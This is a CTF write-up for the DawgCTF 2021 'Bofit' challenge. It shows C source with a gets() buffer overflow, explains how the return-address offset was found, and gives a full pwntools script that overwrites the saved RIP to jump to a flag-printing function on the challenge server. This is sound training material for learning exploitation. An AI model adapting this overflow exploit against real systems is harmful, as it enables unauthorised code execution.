πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
CTFs
HomePentestingLearn
Search…
🚩
Zeyu's CTF Writeups
Home
Pentesting
My Vulnerable Website
My Challenges
Cyber League Major 1
STANDCON CTF 2021
2022
Securinets CTF Finals 2022
NahamCon CTF 2022
Securinets CTF Quals 2022
CTF.SG CTF
YaCTF 2022
DiceCTF 2022
TetCTF 2022
2021
hxp CTF 2021
HTX Investigator's Challenge 2021
Metasploit Community CTF
MetaCTF CyberGames
CyberSecurityRumble CTF
The InfoSecurity Challenge (TISC) 2021
SPbCTF's Student CTF Quals
Asian Cyber Security Challenge (ACSC) 2021
CSAW CTF Qualification Round 2021
YauzaCTF 2021
InCTF 2021
UIUCTF 2021
Google CTF 2021
TyphoonCon CTF 2021
DSTA BrainHack CDDC21
BCACTF 2.0
Zh3ro CTF V2
Pwn2Win CTF 2021
NorzhCTF 2021
DawgCTF 2021
Bofit
Jellyspotters
No Step On Snek
Back to the Lab 2
MDL Considered Harmful
Really Secure Algorithm
The Obligatory RSA Challenge
Trash Chain
What the Flip?!
Back to the Lab 1
Back to the Lab 3
Dr. Hrabowski's Great Adventure
Just a Comment
Baby's First Modulation
Two Truths and a Fib
UMDCTF 2021
Midnight Sun CTF 2021
picoCTF 2021
DSO-NUS CTF 2021
Powered By GitBook
Bofit
Buffer overflow

Challenge

Because Bop It is copyrighted, apparently
nc umbccd.io 4100
Author: trashcanna

Solution

We want to jump here:
1
void win_game(){
2
char buf[100];
3
FILE* fptr = fopen("flag.txt", "r");
4
fgets(buf, 100, fptr);
5
printf("%s", buf);
6
}
Copied!
Using Redare2, the address is 0x00401256.
1
int play_game(){
2
char c;
3
char input[20];
4
int choice;
5
bool correct = true;
6
int score = 0;
7
srand(time(0));
8
while(correct){
9
choice = rand() % 4;
10
switch(choice){
11
case 0:
12
printf("BOF it!\n");
13
c = getchar();
14
if(c != 'B') correct = false;
15
while((c = getchar()) != '\n' && c != EOF);
16
break;
17
​
18
case 1:
19
printf("Pull it!\n");
20
c = getchar();
21
if(c != 'P') correct = false;
22
while((c = getchar()) != '\n' && c != EOF);
23
break;
24
​
25
case 2:
26
printf("Twist it!\n");
27
c = getchar();
28
if(c != 'T') correct = false;
29
while((c = getchar()) != '\n' && c != EOF);
30
break;
31
​
32
case 3:
33
printf("Shout it!\n");
34
gets(input);
35
if(strlen(input) < 10) correct = false;
36
break;
37
}
38
score++;
39
}
40
return score;
41
}
Copied!
In the above function, all the cases are implemented safely with c = getchar(); except for "Shout it!", which uses gets(). gets() does not check the input length and is prone to buffer overflows.
We can play the game until "Shout it!" appears and pass in the output of msf-pattern_create -l 1000 as the input. When the game ends and the function returns, the app crashes and we can see the saved RIP value.
We know the offset is 56.
We have the info we need to craft our payload! The only trick here is to implement some logic to "play the game" until "Shout it!" is used. After sending our payload and overwriting the RIP, we need to give a "wrong" input so that the function returns.
1
from pwn import *
2
​
3
ret = 0x00401256
4
offset = 56
5
payload = b""
6
payload += b"A" * offset
7
payload += p32(ret)
8
print(payload)
9
​
10
conn = remote('umbccd.io', 4100)
11
​
12
conn.recvuntil('BOF it to start!')
13
​
14
line = conn.recvline()
15
while b'Shout it!' not in line:
16
line = line.decode()
17
conn.send(line)
18
line = conn.recvline()
19
​
20
conn.send(payload + b"\n")
21
conn.recvline()
22
conn.send(b"A" + b"\n")
23
print(conn.recv())
24
​
25
conn.close()
Copied!
2021 - Previous
DawgCTF 2021
Next
Jellyspotters
Last modified 13d ago
Copy link
Contents
Challenge
Solution